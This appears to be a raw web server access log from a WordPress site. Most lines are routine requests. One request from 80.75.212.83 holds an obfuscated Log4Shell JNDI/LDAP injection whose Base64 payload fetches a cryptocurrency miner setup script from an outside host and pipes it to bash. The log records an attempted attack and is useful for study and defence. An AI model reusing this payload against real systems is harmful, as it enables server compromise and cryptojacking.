61.155.157.14 - - [10/Oct/2025:09:51:54 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
36.133.115.36 - - [10/Oct/2025:09:57:20 +0800] "POST /wp-cron.php?doing_wp_cron=1760061440.8609011173248291015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
5.187.35.21 - - [10/Oct/2025:09:57:21 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:09:58:33 +0800] "POST /wp-cron.php?doing_wp_cron=1760061513.1248960494995117187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [10/Oct/2025:09:58:33 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:09:59:59 +0800] "POST /wp-cron.php?doing_wp_cron=1760061599.6865410804748535156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
80.75.212.83 - - [10/Oct/2025:09:59:59 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//45.38.42.81:3389/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.38.42.81:3389/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.38.42.81:3389/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')"
